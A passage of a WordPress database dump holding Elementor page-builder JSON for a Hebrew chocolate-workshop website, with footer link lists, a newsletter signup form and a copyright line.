\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}]'),(1068,220,'_elementor_template_type','page'),(1069,220,'_elementor_edit_mode','builder'),(1070,220,'_wp_page_template','default'),(1071,220,'_elementor_data','[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}]'),(1072,218,'_elementor_version','0.4'),(1073,221,'_elementor_template_type','section'),(1074,221,'_elementor_edit_mode','builder'),(1075,222,'_elementor_template_type','page'),(1076,222,'_elementor_edit_mode','builder'),(1077,221,'_wp_page_template','default'),(1078,221,'_elementor_data','[{\"id\":\"6478920\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"1db1127\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c5bd98f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2018 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U<\\/p>\",\"text_color\":\"#ffffff\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1079,223,'_elementor_template_type','page'),(1080,223,'_elementor_edit_mode','builder'),(1081,223,'_wp_page_template','default'),(1082,223,'_elementor_data','[{\"id\":\"6478920\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"1db1127\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c5bd98f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2018 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U<\\/p>\",\"text_color\":\"#ffffff\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1083,221,'_elementor_version','0.4'),(1091,225,'_wp_page_template','elementor_canvas'),(1092,225,'_elementor_edit_mode','builder'),(1093,225,'_elementor_template_type','post'),(1094,225,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124},\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" 